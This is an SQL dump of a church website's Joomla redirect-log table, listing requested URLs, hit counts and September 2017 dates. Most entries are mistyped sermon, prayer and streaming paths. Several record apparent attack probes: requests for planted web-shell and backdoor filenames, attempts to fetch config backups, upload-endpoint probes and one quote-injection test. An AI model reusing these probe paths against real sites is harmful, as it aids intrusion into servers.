(6538, 'https://www.lifeoasisinternationalchurch.org/amazon-store', NULL, '', '', 23, 0, '2017-09-11 13:37:43', '0000-00-00 00:00:00', 301),
(6539, 'https://www.lifeoasisinternationalchurch.org/contact.php', NULL, '', '', 25, 0, '2017-09-11 19:38:02', '0000-00-00 00:00:00', 301),
(6540, 'https://www.lifeoasisinternationalchurch.org/ministries/books', NULL, 'http://www.lifeoasisinternationalchurch.org/ministries/books', '', 24, 0, '2017-09-11 20:06:48', '0000-00-00 00:00:00', 301),
(6541, 'https://lifeoasisinternationalchurch.org/media.php', NULL, '', '', 30, 0, '2017-09-11 21:59:26', '0000-00-00 00:00:00', 301),
(6542, 'https://www.lifeoasisinternationalchurch.org/ministries/musci', NULL, 'http://www.lifeoasisinternationalchurch.org/ministries/musci', '', 12, 0, '2017-09-12 00:58:09', '0000-00-00 00:00:00', 301),
(6543, 'https://lifeoasisinternationalchurch.org/component/users/index.php?option=com_user&view=register', NULL, 'https://lifeoasisinternationalchurch.org/index.php?option=com_user&view=register', '', 7, 0, '2017-09-12 02:44:22', '0000-00-00 00:00:00', 301),
(6544, 'https://lifeoasisinternationalchurch.org/users/index.php?option=com_user&view=register', NULL, 'https://lifeoasisinternationalchurch.org/users/index.php?option=com_user&view=register', '', 7, 0, '2017-09-12 02:44:23', '0000-00-00 00:00:00', 301),
(6545, 'https://www.lifeoasisinternationalchurch.org/ministries/ljmti', NULL, 'http://www.lifeoasisinternationalchurch.org/ministries/ljmti', '', 8, 0, '2017-09-12 05:50:00', '0000-00-00 00:00:00', 301),
(6546, 'https://www.lifeoasisinternationalchurch.org/resokeep', NULL, '', '', 1, 0, '2017-09-12 10:28:01', '0000-00-00 00:00:00', 301),
(6547, 'https://lifeoasisinternationalchurch.org/ldp.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-09-12 10:42:01', '0000-00-00 00:00:00', 301),
(6548, 'https://142.4.21.132:443//_asterisk/jnkp.php', NULL, '', '', 1, 0, '2017-09-12 11:03:15', '0000-00-00 00:00:00', 301),
(6549, 'https://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/20-army-of-the-lord-3', NULL, '', '', 28, 0, '2017-09-12 13:12:07', '0000-00-00 00:00:00', 301),
(6550, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/58-prayer-a-fasting-day', NULL, '', '', 17, 0, '2017-09-12 16:00:49', '0000-00-00 00:00:00', 301),
(6551, 'https://www.lifeoasisinternationalchurch.org/mp3-messages/serie/1?start=20', NULL, '', '', 10, 0, '2017-09-12 20:54:33', '0000-00-00 00:00:00', 301),
(6552, 'https://www.lifeoasisinternationalchurch.org/11-demo-articles/20-welcome', NULL, '', '', 12, 0, '2017-09-12 21:59:46', '0000-00-00 00:00:00', 301),
(6553, 'https://www.lifeoasisinternationalchurch.org/kingdombuilders/', NULL, '', '', 6, 0, '2017-09-12 22:25:02', '0000-00-00 00:00:00', 301),
(6554, 'https://www.lifeoasisinternationalchurch.org/2012-11-09-09-57-10/seminar', NULL, '', '', 8, 0, '2017-09-13 00:38:23', '0000-00-00 00:00:00', 301),
(6555, 'https://www.lifeoasisinternationalchurch.org/index.php/template-info/outreach', NULL, '', '', 9, 0, '2017-09-13 00:39:34', '0000-00-00 00:00:00', 301),
(6556, 'https://lifeoasisinternationalchurch.org/accordion-a/level-21', NULL, '', '', 6, 0, '2017-09-13 04:27:15', '0000-00-00 00:00:00', 301),
(6557, 'https://lifeoasisinternationalchurch.org/sample-levels/level-22', NULL, '', '', 7, 0, '2017-09-13 04:28:02', '0000-00-00 00:00:00', 301),
(6558, 'https://www.lifeoasisinternationalchurch.org/template-info/books', NULL, '', '', 19, 0, '2017-09-13 06:03:30', '0000-00-00 00:00:00', 301),
(6559, 'https://www.lifeoasisinternationalchurch.org/prayer/52-prophetic-words-for-day-4', NULL, '', '', 14, 0, '2017-09-13 07:31:48', '0000-00-00 00:00:00', 301),
(6560, 'https://lifeoasisinternationalchurch.org/component/content/category/11-demo-articles', NULL, '', '', 24, 0, '2017-09-13 11:29:51', '0000-00-00 00:00:00', 301),
(6561, 'https://lifeoasisinternationalchurch.org/mp3-messages/sermons/0/0?sermon_cat=21&start=20', NULL, '', '', 2, 0, '2017-09-13 11:44:52', '0000-00-00 00:00:00', 301),
(6562, 'https://www.lifeoasisinternationalchurch.org/private stream', NULL, '', '', 6, 0, '2017-09-13 12:06:55', '0000-00-00 00:00:00', 301),
(6563, 'https://www.lifeoasisinternationalchurch.org/private-stream', NULL, '', '', 2, 0, '2017-09-13 12:07:26', '0000-00-00 00:00:00', 301),
(6564, 'https://www.lifeoasisinternationalchurch.org/7-kindom-builder/11-prayer-a-fasting-day-2', NULL, '', '', 17, 0, '2017-09-13 14:33:55', '0000-00-00 00:00:00', 301),
(6565, 'https://www.lifeoasisinternationalchurch.org/template-info-2/the-church', NULL, '', '', 5, 0, '2017-09-13 15:10:43', '0000-00-00 00:00:00', 301),
(6566, 'https://www.lifeoasisinternationalchurch.org/straeming', NULL, '', '', 2, 0, '2017-09-13 15:38:31', '0000-00-00 00:00:00', 301),
(6567, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/55-prayer-a-fasting-day-6', NULL, '', '', 18, 0, '2017-09-13 17:41:15', '0000-00-00 00:00:00', 301),
(6568, 'https://www.lifeoasisinternationalchurch.org/live', NULL, '', '', 10, 0, '2017-09-13 17:45:21', '0000-00-00 00:00:00', 301),
(6569, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/51-prophetic-words-for-day-39', NULL, '', '', 31, 0, '2017-09-13 17:47:42', '0000-00-00 00:00:00', 301),
(6570, 'https://www.lifeoasisinternationalchurch.org/training*', NULL, '', '', 29, 0, '2017-09-13 21:00:32', '0000-00-00 00:00:00', 301),
(6571, 'https://lifeoasisinternationalchurch.org/component/jlexblock/', NULL, 'https://lifeoasisinternationalchurch.org/component/jlexblock/?task=password', '', 62, 0, '2017-09-13 21:28:25', '0000-00-00 00:00:00', 301),
(6572, 'https://lifeoasisinternationalchurch.org/accordion-a/level-2', NULL, '', '', 5, 0, '2017-09-13 22:09:15', '0000-00-00 00:00:00', 301),
(6573, 'https://lifeoasisinternationalchurch.org/accordion-b/level-2', NULL, '', '', 5, 0, '2017-09-13 22:31:25', '0000-00-00 00:00:00', 301),
(6574, 'https://lifeoasisinternationalchurch.org/streaminglivingbytheanswer', NULL, '', '', 1, 0, '2017-09-13 23:08:58', '0000-00-00 00:00:00', 301),
(6575, 'https://lifeoasisinternationalchurch.org/accordion-b/level-21', NULL, '', '', 5, 0, '2017-09-13 23:49:36', '0000-00-00 00:00:00', 301),
(6576, 'https://lifeoasisinternationalchurch.org/accordion-a/level-22', NULL, '', '', 5, 0, '2017-09-13 23:53:35', '0000-00-00 00:00:00', 301),
(6577, 'https://www.lifeoasisinternationalchurch.org/loic/revolusola.php', NULL, '', '', 55, 0, '2017-09-14 02:33:36', '0000-00-00 00:00:00', 301),
(6578, 'https://lifeoasisinternationalchurch.org/adnm', NULL, '', '', 1, 0, '2017-09-14 03:09:27', '0000-00-00 00:00:00', 301),
(6579, 'https://lifeoasisinternationalchurch.org/admin', NULL, '', '', 13, 0, '2017-09-14 03:09:37', '0000-00-00 00:00:00', 301),
(6580, 'https://www.lifeoasisinternationalchurch.org/trainning', NULL, '', '', 101, 0, '2017-09-14 03:18:04', '0000-00-00 00:00:00', 301),
(6581, 'https://lifeoasisinternationalchurch.org/mag', NULL, '', '', 17, 0, '2017-09-14 03:49:05', '0000-00-00 00:00:00', 301),
(6582, 'https://lifeoasisinternationalchurch.org/resources/training', NULL, '', '', 16, 0, '2017-09-14 03:56:41', '0000-00-00 00:00:00', 301),
(6583, 'https://www.lifeoasisinternationalchurch.org/streaming/training', NULL, '', '', 8, 0, '2017-09-14 04:30:16', '0000-00-00 00:00:00', 301),
(6584, 'https://www.lifeoasisinternationalchurch.org/resources/kindom-builder', NULL, '', '', 7, 0, '2017-09-14 05:18:24', '0000-00-00 00:00:00', 301),
(6585, 'https://www.lifeoasisinternationalchurch.org/loic/revoyenike.php', NULL, 'http://www.lifeoasisinternationalchurch.org/loic/revoyenike.php', '', 38, 0, '2017-09-14 07:28:31', '0000-00-00 00:00:00', 301),
(6586, 'https://lifeoasisinternationalchurch.org/sample-levels/level-2', NULL, '', '', 4, 0, '2017-09-14 13:36:47', '0000-00-00 00:00:00', 301),
(6587, 'https://www.lifeoasisinternationalchurch.org/loic/ljmt.php', NULL, 'http://www.lifeoasisinternationalchurch.org/loic/ljmt.php', '', 19, 0, '2017-09-14 20:24:55', '0000-00-00 00:00:00', 301),
(6588, 'https://eaglemediaonline.org/t', NULL, '', '', 2, 0, '2017-09-14 20:47:42', '0000-00-00 00:00:00', 301),
(6589, 'https://lifeoasisinternationalchurch.org/prophetic.html', NULL, '', '', 10, 0, '2017-09-14 20:48:12', '0000-00-00 00:00:00', 301),
(6590, 'https://www.lifeoasisinternationalchurch.org/resources/streaming2', NULL, '', '', 19, 0, '2017-09-15 04:53:51', '0000-00-00 00:00:00', 301),
(6591, 'https://www.lifeoasisinternationalchurch.org/index.php/template-info/ljmti', NULL, '', '', 13, 0, '2017-09-15 05:54:49', '0000-00-00 00:00:00', 301),
(6592, 'https://lifeoasisinternationalchurch.org/sample-levels/level-21', NULL, '', '', 6, 0, '2017-09-15 06:52:01', '0000-00-00 00:00:00', 301),
(6593, 'https://lifeoasisinternationalchurch.org/steaming', NULL, '', '', 21, 0, '2017-09-15 17:21:52', '0000-00-00 00:00:00', 301),
(6594, 'https://lifeoasisinternationalchurch.org/images/asom2014.pdf', NULL, '', '', 3, 0, '2017-09-15 17:38:54', '0000-00-00 00:00:00', 301),
(6595, 'https://www.lifeoasisinternationalchurch.org/loicgallery/lib/yui/', NULL, '', '', 7, 0, '2017-09-15 19:58:17', '0000-00-00 00:00:00', 301),
(6596, 'https://www.lifeoasisinternationalchurch.org/event/asom', NULL, '', '', 30, 0, '2017-09-15 20:01:58', '0000-00-00 00:00:00', 301),
(6597, 'https://www.lifeoasisinternationalchurch.org/prayer/63-day-11', NULL, '', '', 10, 0, '2017-09-15 21:47:37', '0000-00-00 00:00:00', 301),
(6598, 'https://www.lifeoasisinternationalchurch.org/streaming34', NULL, '', '', 1, 0, '2017-09-15 22:41:37', '0000-00-00 00:00:00', 301),
(6599, 'https://lifeoasisinternationalchurch.org/gobc2009/index.html', NULL, '', '', 8, 0, '2017-09-16 00:09:11', '0000-00-00 00:00:00', 301),
(6600, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/36-prayer-a-fasting-day-27', NULL, '', '', 16, 0, '2017-09-16 00:10:23', '0000-00-00 00:00:00', 301),
(6601, 'https://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/12', NULL, '', '', 2, 0, '2017-09-16 00:27:41', '0000-00-00 00:00:00', 301),
(6602, 'https://lifeoasisinternationalchurch.org/youtubelife oasis international church', NULL, '', '', 1, 0, '2017-09-16 06:36:21', '0000-00-00 00:00:00', 301),
(6603, 'https://www.lifeoasisinternationalchurch.org/asom2016', NULL, '', '', 33, 0, '2017-09-16 06:55:11', '0000-00-00 00:00:00', 301),
(6604, 'https://www.lifeoasisinternationalchurch.org/template-info/ljmti', NULL, '', '', 10, 0, '2017-09-16 07:52:19', '0000-00-00 00:00:00', 301),
(6605, 'https://www.lifeoasisinternationalchurch.org/streaminge', NULL, '', '', 2, 0, '2017-09-16 07:56:41', '0000-00-00 00:00:00', 301),
(6606, 'https://lifeoasisinternationalchurch.org/feedback.html', NULL, '', '', 9, 0, '2017-09-16 18:59:53', '0000-00-00 00:00:00', 301),
(6607, 'https://lifeoasisinternationalchurch.org/wp-profi1e.php?x=1', NULL, '', '', 3, 0, '2017-09-16 19:11:05', '0000-00-00 00:00:00', 301),
(6608, 'https://lifeoasisinternationalchurch.org/2-uncategorised/47-videos', NULL, '', '', 7, 0, '2017-09-16 20:16:00', '0000-00-00 00:00:00', 301),
(6609, 'https://www.lifeoasisinternationalchurch.org/traning', NULL, '', '', 2, 0, '2017-09-17 06:41:57', '0000-00-00 00:00:00', 301),
(6610, 'https://lifeoasisinternationalchurch.org/pr', NULL, '', '', 6, 0, '2017-09-17 06:42:08', '0000-00-00 00:00:00', 301),
(6611, 'https://lifeoasisinternationalchurch.org/pri', NULL, '', '', 10, 0, '2017-09-17 06:42:09', '0000-00-00 00:00:00', 301),
(6612, 'https://lifeoasisinternationalchurch.org/priv', NULL, '', '', 5, 0, '2017-09-17 06:42:10', '0000-00-00 00:00:00', 301),
(6613, 'https://lifeoasisinternationalchurch.org/priva', NULL, '', '', 9, 0, '2017-09-17 06:42:10', '0000-00-00 00:00:00', 301),
(6614, 'https://lifeoasisinternationalchurch.org/streaming/private', NULL, '', '', 112, 0, '2017-09-17 06:46:27', '0000-00-00 00:00:00', 301),
(6615, 'https://www.lifeoasisinternationalchurch.org/steward', NULL, '', '', 7, 0, '2017-09-17 06:59:28', '0000-00-00 00:00:00', 301),
(6616, 'https://www.lifeoasisinternationalchurch.org/stewards', NULL, '', '', 6, 0, '2017-09-17 07:12:30', '0000-00-00 00:00:00', 301),
(6617, 'https://www.lifeoasisinternationalchurch.org/restricted', NULL, '', '', 1, 0, '2017-09-17 07:12:41', '0000-00-00 00:00:00', 301),
(6618, 'https://lifeoasisinternationalchurch.org/resources/null', NULL, '', '', 3, 0, '2017-09-17 08:07:26', '0000-00-00 00:00:00', 301),
(6619, 'https://lifeoasisinternationalchurch.org/tmp/sfx.php', NULL, '', '', 5, 0, '2017-09-17 09:32:50', '0000-00-00 00:00:00', 301),
(6620, 'https://www.spiritmeat.net/component/users/?view=registration/component/users/?view=login&itemid=101', NULL, '', '', 2, 0, '2017-09-17 10:31:57', '0000-00-00 00:00:00', 301),
(6621, 'https://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/8-enemies-of-gods-word-2', NULL, '', '', 6, 0, '2017-09-17 23:00:14', '0000-00-00 00:00:00', 301),
(6622, 'https://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/7-enemies-of-gods-word-1', NULL, '', '', 3, 0, '2017-09-17 23:00:31', '0000-00-00 00:00:00', 301),
(6623, 'https://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/6-dark-side-of-the-anointing-4', NULL, '', '', 3, 0, '2017-09-17 23:00:37', '0000-00-00 00:00:00', 301),
(6624, 'https://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/null', NULL, '', '', 1, 0, '2017-09-17 23:00:51', '0000-00-00 00:00:00', 301),
(6625, 'https://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/3-dark-side-of-the-anointing-1', NULL, '', '', 7, 0, '2017-09-17 23:00:52', '0000-00-00 00:00:00', 301),
(6626, 'https://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/2-building-a-bilblical-relationship-with-the-word-of-god-2', NULL, '', '', 5, 0, '2017-09-17 23:04:08', '0000-00-00 00:00:00', 301),
(6627, 'https://www.lifeoasisinternationalchurch.org/full-hd-streaming', NULL, '', '', 34, 0, '2017-09-17 23:41:16', '0000-00-00 00:00:00', 301),
(6628, 'https://lifeoasisinternationalchurch.org/writebab.php', NULL, '', '', 6, 0, '2017-09-17 23:54:56', '0000-00-00 00:00:00', 301),
(6629, 'https://lifeoasisinternationalchurch.org/11-demo-articles/54-slide-04', NULL, '', '', 4, 0, '2017-09-18 00:55:49', '0000-00-00 00:00:00', 301),
(6630, 'https://lifeoasisinternationalchurch.org/ups.php', NULL, 'http://lifeoasisinternationalchurch.org/ups.php', '', 2, 0, '2017-09-18 11:11:45', '0000-00-00 00:00:00', 301),
(6631, 'https://lifeoasisinternationalchurch.org/versions.php', NULL, '', '', 7, 0, '2017-09-18 14:20:32', '0000-00-00 00:00:00', 301),
(6632, 'https://www.lifeoasisinternationalchurch.org/12-sample-content/', NULL, '', '', 24, 0, '2017-09-18 14:21:16', '0000-00-00 00:00:00', 301),
(6633, 'https://www.lifeoasisinternationalchurch.org/streaming\'a=0', NULL, 'https://www.lifeoasisinternationalchurch.org/streaming\'A=0', '', 3, 0, '2017-09-18 14:48:30', '0000-00-00 00:00:00', 301),
(6634, 'https://www.lifeoasisinternationalchurch.org/ministries/media-outreach', NULL, '', '', 12, 0, '2017-09-18 15:42:49', '0000-00-00 00:00:00', 301),
(6635, 'https://lifeoasisinternationalchurch.org/xmlrpc-blog.php', NULL, '', '', 6, 0, '2017-09-18 23:54:05', '0000-00-00 00:00:00', 301),
(6636, 'https://www.lifeoasisinternationalchurch.org/index.php/template-info/media-outreach', NULL, '', '', 20, 0, '2017-09-19 07:44:42', '0000-00-00 00:00:00', 301),
(6637, 'https://www.lifeoasisinternationalchurch.org/index.php/62-prayer-focus-for-day-10', NULL, '', '', 29, 0, '2017-09-19 09:04:25', '0000-00-00 00:00:00', 301),
(6638, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/17-prayer-a-fasting-day-1', NULL, '', '', 15, 0, '2017-09-19 09:04:36', '0000-00-00 00:00:00', 301),
(6639, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/34-prayer-a-fasting-day-25', NULL, '', '', 17, 0, '2017-09-19 09:04:48', '0000-00-00 00:00:00', 301),
(6640, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/41-prayer-a-fasting-day-30', NULL, '', '', 18, 0, '2017-09-19 09:04:49', '0000-00-00 00:00:00', 301),
(6641, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/35-prayer-a-fasting-day-26', NULL, '', '', 18, 0, '2017-09-19 09:05:00', '0000-00-00 00:00:00', 301),
(6642, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/53-prayer-a-fasting-day-40', NULL, '', '', 16, 0, '2017-09-19 09:05:10', '0000-00-00 00:00:00', 301),
(6643, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/20-prayer-a-fasting-day-12', NULL, '', '', 16, 0, '2017-09-19 09:05:12', '0000-00-00 00:00:00', 301),
(6644, 'https://lifeoasisinternationalchurch.org/resources/stream', NULL, '', '', 28, 0, '2017-09-19 11:21:25', '0000-00-00 00:00:00', 301),
(6645, 'https://lifeoasisinternationalchurch.org/index1.html', NULL, '', '', 28, 0, '2017-09-19 13:46:59', '0000-00-00 00:00:00', 301),
(6646, 'https://lifeoasisinternationalchurch.org/blog/', NULL, '', '', 2, 0, '2017-09-20 02:13:48', '0000-00-00 00:00:00', 301),
(6647, 'https://lifeoasisinternationalchurch.org/wp/', NULL, '', '', 4, 0, '2017-09-20 02:13:48', '0000-00-00 00:00:00', 301),
(6648, 'https://lifeoasisinternationalchurch.org/jm-ajax/upload_file/', NULL, 'http://lifeoasisinternationalchurch.org/jm-ajax/upload_file/', '', 2, 0, '2017-09-20 09:47:30', '0000-00-00 00:00:00', 301);
INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(6649, 'https://www.lifeoasisinternationalchurch.org/template-info-2/the-church-2', NULL, '', '', 11, 0, '2017-09-20 10:42:41', '0000-00-00 00:00:00', 301),
(6650, 'https://www.lifeoasisinternationalchurch.org/streaming/first', NULL, '', '', 1, 0, '2017-09-20 21:21:01', '0000-00-00 00:00:00', 301),
(6651, 'https://www.lifeoasisinternationalchurch.org/about-us/bible-reading', NULL, '', '', 19, 0, '2017-09-21 02:28:37', '0000-00-00 00:00:00', 301),
(6652, 'https://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/speaker/2?start=20', NULL, '', '', 4, 0, '2017-09-21 07:54:43', '0000-00-00 00:00:00', 301),
(6653, 'https://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/speaker/3-rev-mrs-oyenike-areogun/series', NULL, '', '', 4, 0, '2017-09-21 12:06:42', '0000-00-00 00:00:00', 301),
(6654, 'https://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/8-enemies-of-gods-word-2', NULL, '', '', 10, 0, '2017-09-21 12:16:27', '0000-00-00 00:00:00', 301),
(6655, 'https://lifeoasisinternationalchurch.org/message/message.html', NULL, '', '', 4, 0, '2017-09-21 15:43:55', '0000-00-00 00:00:00', 301),
(6656, 'https://www.lifeoasisinternationalchurch.org/magazine', NULL, '', '', 19, 0, '2017-09-21 23:11:03', '0000-00-00 00:00:00', 301),
(6657, 'https://www.lifeoasisinternationalchurch.org/accomodation.pdf', NULL, '', '', 27, 0, '2017-09-22 12:50:23', '0000-00-00 00:00:00', 301),
(6658, 'https://www.lifeoasisinternationalchurch.org/prayer/prayer/index.php?format=feed&type=atom', NULL, '', '', 8, 0, '2017-09-22 14:26:26', '0000-00-00 00:00:00', 301),
(6659, 'https://lifeoasisinternationalchurch.org/templates/rt_ionosphere/roksprocket/layouts/features/themes/slideshow/css-d768001f3c2bf8ee35738bc5c28af2db.php', NULL, '', '', 3, 0, '2017-09-23 04:49:20', '0000-00-00 00:00:00', 301),
(6660, 'https://www.lifeoasisinternationalchurch.org/web', NULL, 'https://www.lifeoasisinternationalchurch.org/web', '', 48, 0, '2017-09-23 05:38:02', '0000-00-00 00:00:00', 301),
(6661, 'https://www.lifeoasisinternationalchurch.org/web/xmlrpc.php', NULL, 'https://www.lifeoasisinternationalchurch.org/web/xmlrpc.php', '', 1, 0, '2017-09-23 05:38:03', '0000-00-00 00:00:00', 301),
(6662, 'https://www.lifeoasisinternationalchurch.org/streaming)private', NULL, '', '', 1, 0, '2017-09-23 08:09:35', '0000-00-00 00:00:00', 301),
(6663, 'https://lifeoasisinternationalchurch.org/hook-filters.php', NULL, '', '', 5, 0, '2017-09-23 15:29:00', '0000-00-00 00:00:00', 301),
(6664, 'https://lifeoasisinternationalchurch.org/index.php/255-day-20-of-21-days-fasting-and-prayer-october', NULL, '', '', 7, 0, '2017-09-23 16:49:55', '0000-00-00 00:00:00', 301),
(6665, 'https://www.lifeoasisinternationalchurch.org/loicforum/archive/index.php', NULL, '', '', 68, 0, '2017-09-23 19:16:29', '0000-00-00 00:00:00', 301),
(6666, 'https://lifeoasisinternationalchurch.org/downloader', NULL, '', '', 1, 0, '2017-09-23 21:50:55', '0000-00-00 00:00:00', 301),
(6667, 'https://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/23', NULL, '', '', 3, 0, '2017-09-23 22:37:50', '0000-00-00 00:00:00', 301),
(6668, 'https://www.lifeoasisinternationalchurch.org/ministries/gin', NULL, '', '', 14, 0, '2017-09-23 22:38:27', '0000-00-00 00:00:00', 301),
(6669, 'https://www.lifeoasisinternationalchurch.org/featured-messages/2-uncategorised/47-videos', NULL, '', '', 16, 0, '2017-09-23 22:39:36', '0000-00-00 00:00:00', 301),
(6670, 'https://www.lifeoasisinternationalchurch.org/mp3-messages/sermons/0/0?limitstart=0', NULL, '', '', 2, 0, '2017-09-23 22:43:07', '0000-00-00 00:00:00', 301),
(6671, 'https://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/15-entering-into-winning-position-3', NULL, '', '', 4, 0, '2017-09-23 22:43:10', '0000-00-00 00:00:00', 301),
(6672, 'https://www.lifeoasisinternationalchurch.org/loic/partnership.php', NULL, '', '', 14, 0, '2017-09-23 22:43:11', '0000-00-00 00:00:00', 301),
(6673, 'https://lifeoasisinternationalchurch.org/dreamcentre.html', NULL, '', '', 11, 0, '2017-09-24 02:45:59', '0000-00-00 00:00:00', 301),
(6674, 'https://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/36-prayer-a-fasting-day-27', NULL, '', '', 2, 0, '2017-09-24 06:24:16', '0000-00-00 00:00:00', 301),
(6675, 'https://lifeoasisinternationalchurch.org/strea', NULL, '', '', 29, 0, '2017-09-24 07:16:33', '0000-00-00 00:00:00', 301),
(6676, 'https://www.lifeoasisinternationalchurch.org/streeming', NULL, '', '', 1, 0, '2017-09-24 08:47:12', '0000-00-00 00:00:00', 301),
(6677, 'https://142.4.21.132/about.php', NULL, '', '', 1, 0, '2017-09-24 13:31:10', '0000-00-00 00:00:00', 301),
(6678, 'https://www.lifeoasisinternationalchurch.org/about-us/dream-centre-ordained-pastors', NULL, '', '', 50, 0, '2017-09-24 16:17:22', '0000-00-00 00:00:00', 301),
(6679, 'https://lifeoasisinternationalchurch.org/thankyous.php', NULL, '', '', 1, 0, '2017-09-24 16:29:51', '0000-00-00 00:00:00', 301),
(6680, 'https://lifeoasisinternationalchurch.org/cod.php', NULL, '', '', 15, 0, '2017-09-24 18:04:19', '0000-00-00 00:00:00', 301),
(6681, 'https://lifeoasisinternationalchurch.org/readme.html', NULL, '', '', 2, 0, '2017-09-25 00:47:36', '0000-00-00 00:00:00', 301),
(6682, 'https://lifeoasisinternationalchurch.org/sqlbuddy', NULL, 'http://lifeoasisinternationalchurch.org/sqlbuddy', '', 1, 0, '2017-09-25 04:14:32', '0000-00-00 00:00:00', 301),
(6683, 'https://lifeoasisinternationalchurch.org/ministries/outreach', NULL, '', '', 14, 0, '2017-09-25 06:47:31', '0000-00-00 00:00:00', 301),
(6684, 'https://lifeoasisinternationalchurch.org/configurationbak.php', NULL, 'lifeoasisinternationalchurch.org', '', 5, 0, '2017-09-25 09:33:13', '0000-00-00 00:00:00', 301),
(6685, 'https://lifeoasisinternationalchurch.org/script.php', NULL, 'lifeoasisinternationalchurch.org', '', 6, 0, '2017-09-25 11:03:37', '0000-00-00 00:00:00', 301),
(6686, 'https://lifeoasisinternationalchurch.org/conns.php', NULL, 'http://lifeoasisinternationalchurch.org/conns.php', '', 1, 0, '2017-09-25 16:41:01', '0000-00-00 00:00:00', 301),
(6687, 'https://lifeoasisinternationalchurch.org/webconfig.txt.php', NULL, '', '', 8, 0, '2017-09-25 17:24:29', '0000-00-00 00:00:00', 301),
(6688, 'https://lifeoasisinternationalchurch.org/ministries/gin/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-09-25 20:11:00', '0000-00-00 00:00:00', 301),
(6689, 'https://lifeoasisinternationalchurch.org/configbak.php', NULL, '', '', 7, 0, '2017-09-25 22:02:35', '0000-00-00 00:00:00', 301),
(6690, 'https://lifeoasisinternationalchurch.org/branches/18-loic/50-young-achievers', NULL, '', '', 9, 0, '2017-09-26 02:03:36', '0000-00-00 00:00:00', 301),
(6691, 'https://lifeoasisinternationalchurch.org/wp-kidmx.php?script=1', NULL, '', '', 5, 0, '2017-09-26 04:05:36', '0000-00-00 00:00:00', 301),
(6692, 'https://lifeoasisinternationalchurch.org/media/com_acymailing/css/css-6519469ace9dc29cf2caa5b8bed4a411.php', NULL, 'http://lifeoasisinternationalchurch.org/spiritmeat/index.php/40-be-careful-what-you-hear-mark-4-24', '', 2, 0, '2017-09-26 05:52:54', '0000-00-00 00:00:00', 301),
(6693, 'https://lifeoasisinternationalchurch.org/templates/rt_ionosphere/roksprocket/layouts/headlines/themes/default/css-be655ee638bd52b1c1503fcccf4f9864.php', NULL, 'http://lifeoasisinternationalchurch.org/spiritmeat/index.php/40-be-careful-what-you-hear-mark-4-24', '', 5, 0, '2017-09-26 05:52:54', '0000-00-00 00:00:00', 301),
(6694, 'https://lifeoasisinternationalchurch.org/cache.php', NULL, 'lifeoasisinternationalchurch.org', '', 6, 0, '2017-09-26 12:25:14', '0000-00-00 00:00:00', 301),
(6695, 'https://lifeoasisinternationalchurch.org/wp-rdf.php', NULL, 'lifeoasisinternationalchurch.org', '', 10, 0, '2017-09-26 12:25:21', '0000-00-00 00:00:00', 301),
(6696, 'https://lifeoasisinternationalchurch.org/', NULL, 'lifeoasisinternationalchurch.org', '', 1120, 0, '2017-09-26 12:26:33', '0000-00-00 00:00:00', 301),
(6697, 'https://lifeoasisinternationalchurch.org/wp-register.php', NULL, 'lifeoasisinternationalchurch.org', '', 9, 0, '2017-09-26 12:26:38', '0000-00-00 00:00:00', 301),
(6698, 'https://lifeoasisinternationalchurch.org/1.php', NULL, 'lifeoasisinternationalchurch.org', '', 2, 0, '2017-09-26 12:32:21', '0000-00-00 00:00:00', 301),
(6699, 'https://lifeoasisinternationalchurch.org/yt2.php', NULL, 'lifeoasisinternationalchurch.org', '', 14, 0, '2017-09-26 17:41:05', '0000-00-00 00:00:00', 301),
(6700, 'https://lifeoasisinternationalchurch.org/indes.php', NULL, 'lifeoasisinternationalchurch.org', '', 10, 0, '2017-09-26 17:47:06', '0000-00-00 00:00:00', 301),
(6701, 'https://lifeoasisinternationalchurch.org/ytt.php', NULL, 'lifeoasisinternationalchurch.org', '', 13, 0, '2017-09-26 17:48:07', '0000-00-00 00:00:00', 301),
(6702, 'https://lifeoasisinternationalchurch.org/wp-conde.php', NULL, 'lifeoasisinternationalchurch.org', '', 10, 0, '2017-09-26 17:51:26', '0000-00-00 00:00:00', 301),
(6703, 'https://lifeoasisinternationalchurch.org/cgi-bin/temp.php', NULL, 'lifeoasisinternationalchurch.org', '', 4, 0, '2017-09-26 17:55:22', '0000-00-00 00:00:00', 301),
(6704, 'https://lifeoasisinternationalchurch.org/var/export/', NULL, '', '', 1, 0, '2017-09-26 18:07:06', '0000-00-00 00:00:00', 301),
(6705, 'https://lifeoasisinternationalchurch.org/index.php/246-day-10-of-21-days-fasting-and-prayer-october', NULL, '', '', 11, 0, '2017-09-26 18:20:05', '0000-00-00 00:00:00', 301),
(6706, 'https://www.lifeoasisinternationalchurch.org/index.php/12-sample-content/', NULL, '', '', 2, 0, '2017-09-26 18:46:09', '0000-00-00 00:00:00', 301),
(6707, 'https://lifeoasisinternationalchurch.org/18-loic/50-young-achievers', NULL, '', '', 17, 0, '2017-09-26 19:25:01', '0000-00-00 00:00:00', 301),
